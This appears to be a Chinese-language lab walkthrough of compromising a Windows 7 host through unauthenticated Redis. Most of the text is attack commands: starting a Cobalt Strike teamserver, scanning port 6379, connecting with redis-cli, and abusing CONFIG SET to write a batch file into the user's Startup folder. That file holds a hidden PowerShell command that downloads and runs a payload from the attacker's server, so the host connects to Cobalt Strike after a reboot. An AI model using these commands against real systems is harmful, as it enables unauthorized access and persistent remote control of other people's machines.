文章目录
简介
cs服务器:192.168.43.113(kali)
cs客户端兼攻击机:192.168.43.101(win10)
靶机:192.168.43.42(win7)
前期准备
kali搭建cs服务器
sudo ./teamserver 192.168.43.113 yuchi123
win10启动cs客户端
探测靶机开放端口
nmap.exe 192.168.43.42 -p 6379
攻击步骤
nmap探测是否存在redis未授权
nmap探测到redis的信息,说明存在redis未授权漏洞
我们这边探测到目标主机为windos,所以可以利用写入启动项的方法进行cs上线
若目标主机是linux的话,网上有很多教程方法,我这里就不介绍了
连接靶机redis
redis-cli -h 192.168.43.42
成功连接,可查看到信息
cs上线
利用redis写入启动项,目标主机重启之后即可上线
cs开启监听
创建监听端口
选择我们刚刚创建的监听
监听开启成功
redis写入powershell
192.168.43.42:6379> config set dir "C:/Users/yuchi/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
#这里正常的user应该是Administrator,而我这边是yuchi,是因为靶机用户名是yuchi,所以需要修改,不然没有路径(这就是修改用户名的重要性)
192.168.43.42:6379> CONFIG SET dbfilename 1.bat
192.168.43.42:6379> set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.43.113:80/a'))\"\r\n\r\n"
#这里需要注意一下,由于dbfile本身是有内容的,因此命令要正常运行必须先换行,经过测试需要两个换行符rn才能正常运行,还有一个是由于本身执行命令中也有双引号,因此需要加入转义,所以在前后加了\r\n\r\n,以及在里面的双引号前面加\进行转义
192.168.43.42:6379> save
我们看一下写进去之后的样子,在相关路径下出现了1.bat的文件,文件内容就是我们写进去的shell
靶机重启,cs上线
我们手动将靶机重启,重启之后,cs客户端就会上线靶机了
我们修改下心跳时间,这样有利于我们执行命令